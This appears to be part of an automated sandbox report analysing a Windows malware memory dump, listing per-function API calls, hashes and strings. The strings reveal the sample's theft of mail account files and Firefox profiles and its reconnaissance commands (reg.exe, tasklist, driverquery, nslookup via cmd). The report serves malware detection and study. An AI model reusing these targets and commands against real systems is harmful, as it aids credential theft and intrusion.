RtlEnterCriticalSection.NTDLL(?), ref: 009D0B15
RtlLeaveCriticalSection.NTDLL(?), ref: 009D0B24

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateErrorHeapLastmemset
String ID:
API String ID: 2000578454-0
Opcode ID: e2487d982953d38c4fb9ca928a1a7859271bf30faa6decd04915880df63e8c4a
Instruction ID: 2514750d77cc820464212d55504ac90bb19c0f84d2de5b831b2fc3e0ddb12039
Opcode Fuzzy Hash: e2487d982953d38c4fb9ca928a1a7859271bf30faa6decd04915880df63e8c4a
Instruction Fuzzy Hash: 36418FB1941705EFDB20DF65C884BAABBF8FF48744F10851AE549D7290D774AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009B3828, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 009B3842
CreateWaitableTimerA.KERNEL32(009DE0D4,00000003,?), ref: 009B385F
GetLastError.KERNEL32(?,?,009C3A3F,?,?,?,00000000,?,?,?), ref: 009B3870

Part of subcall function 009C672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,009B1CDF,00000000,00000000,?,?,00000000,?,?,?,009B1CDF,TorClient), ref: 009C6765
Part of subcall function 009C672D: RtlAllocateHeap.NTDLL(00000000,009B1CDF), ref: 009C6779
Part of subcall function 009C672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,009B1CDF,?,?,?,009B1CDF,TorClient,?,?), ref: 009C6793
Part of subcall function 009C672D: RegCloseKey.KERNELBASE(?,?,?,?,009B1CDF,TorClient,?,?), ref: 009C67BD

GetSystemTimeAsFileTime.KERNEL32(?,00000000,009C3A3F,?,?,?,009C3A3F,?), ref: 009B38B0
SetWaitableTimer.KERNEL32(00000000,009C3A3F,00000000,00000000,00000000,00000000,?,?,009C3A3F,?), ref: 009B38CF
HeapFree.KERNEL32(00000000,009C3A3F,00000000,009C3A3F,?,?,?,009C3A3F,?), ref: 009B38E5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: 71a603b2c20929d9963f597fe88433d7f03ad75d8ac544bbf0fb18f0fa59398d
Instruction ID: 6abbbfc425cd102487c39b4776098e9209d9c806d7949a3c78b6e8e281f4b692
Opcode Fuzzy Hash: 71a603b2c20929d9963f597fe88433d7f03ad75d8ac544bbf0fb18f0fa59398d
Instruction Fuzzy Hash: 28313871914209FBCF20DF95CE89DEFBBBDEB94361B20841AF405A2111D7709B84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009CBAE9, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 009CBB28
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009CBB39
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 009CBB54
GetLastError.KERNEL32 ref: 009CBB6A
HeapFree.KERNEL32(00000000,?), ref: 009CBB7C
HeapFree.KERNEL32(00000000,?), ref: 009CBB91

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: ffcab7be7a1301c5d7a6b0e37ef4a6182a2008ed087ffd85c7d1ccb36303b7bc
Instruction ID: 558b48834d89b9ccf18b4bdbdfdf65e5cb09d4bb32d5d938bed01d8d0d697500
Opcode Fuzzy Hash: ffcab7be7a1301c5d7a6b0e37ef4a6182a2008ed087ffd85c7d1ccb36303b7bc
Instruction Fuzzy Hash: 9B112C76952018BBCB225B95DC09DEFBF7EEB453A0F104466F505A2061C7314E91EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009CB291, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 009CB2B9
_strupr.NTDLL ref: 009CB2F4
lstrlen.KERNEL32(00000000), ref: 009CB2FC
TerminateProcess.KERNEL32(00000000,00000000), ref: 009CB33C
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 009CB343
GetLastError.KERNEL32 ref: 009CB34B

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: bd574b8c2b582dcfc78c95ffcea1402dc591df07908d46c04cb2470083db6202
Instruction ID: 46f82e1cb64f2a22e37aa51dc63dfdf1f66cfe2400dadea8edd0d552401bfa76
Opcode Fuzzy Hash: bd574b8c2b582dcfc78c95ffcea1402dc591df07908d46c04cb2470083db6202
Instruction Fuzzy Hash: 5C11B272556145AFCB106B71DC89EEF3B6CAB88750F10441AFA02D3151DF74D888DA61

Uniqueness

Uniqueness Score: -1.00%

Function 009B95DC, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

LoadLibraryA.KERNEL32(6676736D,00000000,00000001,00000014,00000020,009D4804,00000000,00000001), ref: 009B95FC
GetProcAddress.KERNEL32(00000000,704F4349), ref: 009B961B
GetProcAddress.KERNEL32(00000000,6C434349), ref: 009B9630
GetProcAddress.KERNEL32(00000000,6E494349), ref: 009B9646
GetProcAddress.KERNEL32(00000000,65474349), ref: 009B965C
GetProcAddress.KERNEL32(00000000,65534349), ref: 009B9672

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: c9510ac729752cb70274bf9cacb1890a61fd3ffcd81bba8a47b35dd717c5bf50
Instruction ID: c6a80c4dffcdf16d1ad64b26616903e667467ea1ed417bbd16a2b903733f11b1
Opcode Fuzzy Hash: c9510ac729752cb70274bf9cacb1890a61fd3ffcd81bba8a47b35dd717c5bf50
Instruction Fuzzy Hash: 6C1186B22157079FD710EB78DD80D6733ECAB443543050466EA09CB165D774EC89CB70

Uniqueness

Uniqueness Score: -1.00%

Function 009B9E9F, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,009B48BE,009D1A07,00000057,00000000,?,?,?,009B6516,00000000,Scr), ref: 009B9EB5
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 009B9EC8
lstrcpy.KERNEL32(00000008,?), ref: 009B9EEA
GetLastError.KERNEL32(009C328C,00000000,00000000,?,?,009B48BE,009D1A07,00000057,00000000,?,?,?,009B6516,00000000,Scr,?), ref: 009B9F13
HeapFree.KERNEL32(00000000,00000000,?,?,009B48BE,009D1A07,00000057,00000000,?,?,?,009B6516,00000000,Scr,?,?), ref: 009B9F2B
CloseHandle.KERNEL32(00000000,009C328C,00000000,00000000,?,?,009B48BE,009D1A07,00000057,00000000,?,?,?,009B6516,00000000,Scr), ref: 009B9F34

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 72459bca31942ae232a1321bc63b5885d3392ecc21c416b6fae79137aa1a3758
Instruction ID: 8077e87dd066f11214a652628c052bf1fbfa082f9929e5b5d0a01da8baa5a530
Opcode Fuzzy Hash: 72459bca31942ae232a1321bc63b5885d3392ecc21c416b6fae79137aa1a3758
Instruction Fuzzy Hash: EC119371566205EFDB109F69DD889EFBBB8FB01370710892AF55AC3250DB708D45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C8800, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
GetCurrentThreadId.KERNEL32 ref: 009C8838
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
lstrcpy.KERNEL32(00000000), ref: 009C8874

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 4ed747638f4a7e7cd3f9924087299f150eb0d4e409eb69906c75d418d33cc59c
Instruction ID: 49da86504803667178d987709a59cd586fda3d4ba2bd1a351084eab701cf73d6
Opcode Fuzzy Hash: 4ed747638f4a7e7cd3f9924087299f150eb0d4e409eb69906c75d418d33cc59c
Instruction Fuzzy Hash: 8E018073A11114ABD7119BA6DC88FAB7BBCDFC5B40709002ABA15D7111DE70D84596B1

Uniqueness

Uniqueness Score: -1.00%

Function 009C9299, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C92F4
SetLastError.KERNEL32(00000000,?,?,?), ref: 009C9348

Strings

vids, xrefs: 009C9353

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 07e06df67e2c9c7b606b8bc5c9baeb374d2f8355f1b74a395d6a01d13412eabd
Instruction ID: 3fccd0b6385cc2e1177889427a48f531bd3a290a09127d951ddb675f38f603dc
Opcode Fuzzy Hash: 07e06df67e2c9c7b606b8bc5c9baeb374d2f8355f1b74a395d6a01d13412eabd
Instruction Fuzzy Hash: 498128B1D102299FCF25DFA4C885EEDBBB9BF48710F10815AF819AB251D7309A41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 009C5EC0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 009C5F6B
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 009C5FD2
GetLastError.KERNEL32(?,00000000,00000000), ref: 009C5FDC

Strings

P, xrefs: 009C5F8F
K, xrefs: 009C5F93

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: faee98322d76aee2a7502714c68ee5688b59d236d6b44c53990cd3a63b5fd760
Instruction ID: ba9738dc8de0bf53ea080e908457124150978a4da472f5324bcb80c4bfa56735
Opcode Fuzzy Hash: faee98322d76aee2a7502714c68ee5688b59d236d6b44c53990cd3a63b5fd760
Instruction Fuzzy Hash: 16417131900B059FDB28CFA8CA44BAEBBF5BF14704F15492DE48693A41D774F984CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009C5745, Relevance: 8.9, APIs: 7, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,009C09E2,00000000,?,?,?,009C09E2,?,?,?,?,?), ref: 009C5783
lstrlen.KERNEL32(009C09E2,?,?,?,009C09E2,?,?,?,?,?), ref: 009C5795
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 009C5809
lstrlen.KERNEL32(009C09E2,00000000,00000000,?,?,?,009C09E2,?,?,?,?,?), ref: 009C581E
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 009C5837
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 009C5840
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009C584E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: f170f16d415ecdd93193735b0f6b253c87eb1fe2f6c1935f95555be1005a514c
Instruction ID: fbbdd22f1ed08953d2207aa6d10de33c2987adbc62b28c59f5127252f71d81d0
Opcode Fuzzy Hash: f170f16d415ecdd93193735b0f6b253c87eb1fe2f6c1935f95555be1005a514c
Instruction Fuzzy Hash: F831EAB2C0021AAFDF119F65DC469DF3BA8EF543A0F15442AFC0496211E731DEA09BE1

Uniqueness

Uniqueness Score: -1.00%

Function 009BC790, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009C2891: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?,?), ref: 009C289F

RtlAllocateHeap.NTDLL(00000000,?), ref: 009BC7F1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 009BC840

Part of subcall function 009C4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,009C1ED8), ref: 009C4282
Part of subcall function 009C4241: GetLastError.KERNEL32 ref: 009C428C
Part of subcall function 009C4241: WaitForSingleObject.KERNEL32(000000C8), ref: 009C42B1
Part of subcall function 009C4241: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 009C42D2
Part of subcall function 009C4241: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 009C42FA
Part of subcall function 009C4241: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 009C430F
Part of subcall function 009C4241: SetEndOfFile.KERNEL32(00000006), ref: 009C431C
Part of subcall function 009C4241: CloseHandle.KERNEL32(00000006), ref: 009C4334

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,009C314E,?,?,?,?,?,?), ref: 009BC875
HeapFree.KERNEL32(00000000,?,?,?,?,009C314E,?,?,?,?,?,?,00000000,?,00000000), ref: 009BC885

Strings

https://, xrefs: 009BC7A2

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID: https://
API String ID: 4200334623-4275131719
Opcode ID: 8da7865ae1257c44dc77849fc02de8ec434118a49e13ac8e414ca11ee9375219
Instruction ID: eab4a62379472e99f99cd1a812d6448dbba67a54b994a65c23d1c2c5842be489
Opcode Fuzzy Hash: 8da7865ae1257c44dc77849fc02de8ec434118a49e13ac8e414ca11ee9375219
Instruction Fuzzy Hash: 08311AB5951019FFEB109FA4DD89DAEBB7DFB08350B100466F501E3160DB71AD91EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D2639, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009CF750: memcpy.NTDLL(00000000,00000090,?,?,00000000,00000000), ref: 009CF78C
Part of subcall function 009CF750: memset.NTDLL ref: 009CF808
Part of subcall function 009CF750: memset.NTDLL ref: 009CF81D

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 009D268D
lstrcmpi.KERNEL32(00000000,Main), ref: 009D26AD
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009D26F2
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,00000000), ref: 009D2703

Strings

Main, xrefs: 009D26A5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID: Main
API String ID: 1065503980-521822810
Opcode ID: f9382a68201baa1fff9d6ddff2160fe3a83ed7f3f7a33ab33666927ead6abb7a
Instruction ID: 9679f0028dfffbd771d31213ebf576d973c8b155be0cd2f872cb1329d60351e7
Opcode Fuzzy Hash: f9382a68201baa1fff9d6ddff2160fe3a83ed7f3f7a33ab33666927ead6abb7a
Instruction Fuzzy Hash: EC21BC31A91205FFCF11AFA4DC44FAE7BB9EB54314F108466F801E6261CB30AD44EB10

Uniqueness

Uniqueness Score: -1.00%

Function 009D24E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(6AD68BFC,009B619F,?,009B619F,00000004), ref: 009D2518

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 009D252F
StrChrA.SHLWAPI(00000000,0000002E,?,009B619F,00000004), ref: 009D2538
GetModuleHandleA.KERNEL32(00000000,?,009B619F,00000004), ref: 009D2556

Part of subcall function 009B1000: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,009DD518,00000000,?), ref: 009B10D7
Part of subcall function 009B1000: VirtualProtect.KERNELBASE(00000000,00000004,009DD518,009DD518,?,00000004,00000000,00000004,009DD518,00000000,?,00000000,00000002,009DA568,0000001C,009C5176), ref: 009B10F2
Part of subcall function 009B1000: RtlEnterCriticalSection.NTDLL(009DE240), ref: 009B1116

Strings

t, xrefs: 009D2556

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID: t
API String ID: 105881616-2238339752
Opcode ID: aba619ba6d89a20d76a14d3822fad936b55aa1a3eca3d5fa3df80234b2626681
Instruction ID: 3c2454dce9e1e4df5f133df9230116507fc844fe961fdf004ab604b804a3adf1
Opcode Fuzzy Hash: aba619ba6d89a20d76a14d3822fad936b55aa1a3eca3d5fa3df80234b2626681
Instruction Fuzzy Hash: 1C217770A44205EFDB10DF68D898FAEBBF9AF94300F10845AF40697361DBB4DA85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009BF4CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,?,009B6709,?,?,?,Salt,?,?,?,Store Root,?), ref: 009BF4E1

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

mbstowcs.NTDLL ref: 009BF4FD
lstrlen.KERNEL32(account{*}.oeaccount), ref: 009BF50B
mbstowcs.NTDLL ref: 009BF523

Part of subcall function 009C888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 009C88D9
Part of subcall function 009C888D: lstrlenW.KERNEL32(?,?,00000000), ref: 009C88E5
Part of subcall function 009C888D: memset.NTDLL ref: 009C892D
Part of subcall function 009C888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8948
Part of subcall function 009C888D: lstrlenW.KERNEL32(0000002C), ref: 009C8980
Part of subcall function 009C888D: lstrlenW.KERNEL32(?), ref: 009C8988
Part of subcall function 009C888D: memset.NTDLL ref: 009C89AB
Part of subcall function 009C888D: wcscpy.NTDLL ref: 009C89BD

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Strings

account{*}.oeaccount, xrefs: 009BF505, 009BF50A, 009BF521

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
String ID: account{*}.oeaccount
API String ID: 1961997177-4234512180
Opcode ID: 5d70df8a3a78d3ab1c10fcea4e19cd50ad86d4e47a609de366861ec5fcc88e43
Instruction ID: ad245e6f45be6a2c0be48c2bb33d2c8ad2625e69b64270b5b578cf2f5aa4ca1e
Opcode Fuzzy Hash: 5d70df8a3a78d3ab1c10fcea4e19cd50ad86d4e47a609de366861ec5fcc88e43
Instruction Fuzzy Hash: FD0192B2D10204BBDF216BA5DC86FDF7EACEBC5350F10802AB904A3151EA75DA4486A0

Uniqueness

Uniqueness Score: -1.00%

Function 009C4406, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 009C4422
lstrlen.KERNEL32(EMPTY,00000008,00000000,0000010E,00000000,00000000,?,00000000,64F16420,?,009BB1B4,?,?,00000000,?,?), ref: 009C4456
HeapFree.KERNEL32(00000000,00000000,EMPTY,00000000,?,00000000,64F16420,?,009BB1B4,?,?,00000000,?,?,00000001,00000000), ref: 009C4472

Strings

EMPTY, xrefs: 009C4450, 009C4455, 009C445D
log, xrefs: 009C445E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen
String ID: EMPTY$log
API String ID: 3886119090-141014656
Opcode ID: de67c6a38f9ad9a6a5907bfb6b212c3d33e99ff744124fb2a558183d0f0b44ea
Instruction ID: 84ea871920f9c7e6b2f833e6b00ea7319d858e2256e155ad8f04352d4486a293
Opcode Fuzzy Hash: de67c6a38f9ad9a6a5907bfb6b212c3d33e99ff744124fb2a558183d0f0b44ea
Instruction Fuzzy Hash: EC01F972A52214BBC7315B999C49FDB7BEDDBC57A07304427F101D3160D5B04D80D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 009B8A10, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(009DDF60,00000000), ref: 009B8A20
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 009B8A3A
lstrcpy.KERNEL32(00000000,-01), ref: 009B8A5A
HeapFree.KERNEL32(00000000,00000000,009DDF60,?,00000000,00000000,00000000,?,00000000,009D0F94,00000000,00000000), ref: 009B8A7D

Part of subcall function 009D59F7: SetEvent.KERNEL32(?,009B8A31,?,00000000,009D0F94,00000000,00000000), ref: 009D5A0B
Part of subcall function 009D59F7: WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,009D0F94,00000000,00000000), ref: 009D5A25
Part of subcall function 009D59F7: CloseHandle.KERNEL32(?,?,00000000,009D0F94,00000000,00000000), ref: 009D5A2E
Part of subcall function 009D59F7: CloseHandle.KERNEL32(?,0000003C,?,00000000,009D0F94,00000000,00000000), ref: 009D5A3C
Part of subcall function 009D59F7: RtlEnterCriticalSection.NTDLL(00000008), ref: 009D5A48
Part of subcall function 009D59F7: RtlLeaveCriticalSection.NTDLL(00000008), ref: 009D5A71
Part of subcall function 009D59F7: CloseHandle.KERNEL32(?), ref: 009D5A8D
Part of subcall function 009D59F7: LocalFree.KERNEL32(?), ref: 009D5A9B
Part of subcall function 009D59F7: RtlDeleteCriticalSection.NTDLL(00000008), ref: 009D5AA5

Strings

-01, xrefs: 009B8A52

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
String ID: -01
API String ID: 1103286547-1095514728
Opcode ID: c2f8f2aa089f4dbe20bfdbd9efcb3c042fa05bd8d9fe93a10e2816c9b9c4d061
Instruction ID: 13e9b3e17dc27b0b02b0230eaa8100af3f197467075c6bd5a05637a30a2a5591
Opcode Fuzzy Hash: c2f8f2aa089f4dbe20bfdbd9efcb3c042fa05bd8d9fe93a10e2816c9b9c4d061
Instruction Fuzzy Hash: 4CF0C2B36EB2187FD6202BA5EC8CEBB7F5CE7993A5B004527F20592210CE218C45E670

Uniqueness

Uniqueness Score: -1.00%

Function 009B4B29, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,009BF1E8,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000), ref: 009B4B2E
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 009B4B43
wsprintfA.USER32 ref: 009B4B58

Part of subcall function 009BB598: memset.NTDLL ref: 009BB5AD
Part of subcall function 009BB598: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 009BB5E6
Part of subcall function 009BB598: wcstombs.NTDLL ref: 009BB5F0
Part of subcall function 009BB598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 009BB621
Part of subcall function 009BB598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,009C793E), ref: 009BB64D
Part of subcall function 009BB598: TerminateProcess.KERNEL32(?,000003E5), ref: 009BB663
Part of subcall function 009BB598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,009C793E), ref: 009BB677
Part of subcall function 009BB598: CloseHandle.KERNEL32(?), ref: 009BB6AA
Part of subcall function 009BB598: CloseHandle.KERNEL32(?), ref: 009BB6AF

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 009B4B74

Strings

cmd /U /C "type %s1 > %s & del %s1", xrefs: 009B4B52

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
String ID: cmd /U /C "type %s1 > %s & del %s1"
API String ID: 1624158581-4158521270
Opcode ID: 49681ea3fd90d063c778e14b78b41dd7316bc4d8bc0fe0c740dff28d15842ceb
Instruction ID: 5eda88286e36ac4446046c7cfbc0210e33966962f3293039e3d6f58a01055a4e
Opcode Fuzzy Hash: 49681ea3fd90d063c778e14b78b41dd7316bc4d8bc0fe0c740dff28d15842ceb
Instruction Fuzzy Hash: 2CF0A73169B12077C521172DEC0DF9B7F2DDFD2B71F140122F505E52E2CB508895A5A4

Uniqueness

Uniqueness Score: -1.00%

Function 009C447F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,.dll,?,00000000,009BA218,?,.dll,?,00001000,?,?,?), ref: 009C448D
lstrlen.KERNEL32(DllRegisterServer), ref: 009C449B
RtlAllocateHeap.NTDLL(00000000,00000022), ref: 009C44B0

Strings

.dll, xrefs: 009C448B
DllRegisterServer, xrefs: 009C4493, 009C4498, 009C44C1

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateHeap
String ID: .dll$DllRegisterServer
API String ID: 3070124600-294589026
Opcode ID: c5fd8ff19387deeedeb34b8e5a4f78702111398737171e6646689c3122e3c1e6
Instruction ID: 95ff8831c57f41c4917635babe6211dc299bf90875973cf921c1f0e11fb1f24c
Opcode Fuzzy Hash: c5fd8ff19387deeedeb34b8e5a4f78702111398737171e6646689c3122e3c1e6
Instruction Fuzzy Hash: C8F0E973A56260ABD3214B99DC88F97BBECFB447507040127F909D3221D6709C94D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009BF675, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(06288D20), ref: 009BF67E
Sleep.KERNEL32(0000000A,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009BF688
HeapFree.KERNEL32(00000000,?,?,?,009D58C6,?,?,?,?,?,009B20D2,?), ref: 009BF6B6
RtlLeaveCriticalSection.NTDLL(06288D20), ref: 009BF6CB

Strings

0123456789ABCDEF, xrefs: 009BF6A5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: 0123456789ABCDEF
API String ID: 58946197-2554083253
Opcode ID: 82bab8622a565772cec72fd73f991fd45cdf50493a707aaa4589c1bd15b89371
Instruction ID: ba3ec7fceeb77ea9473660bce76bedf2bca11c35905bc0bbe4df3c3ccf78196e
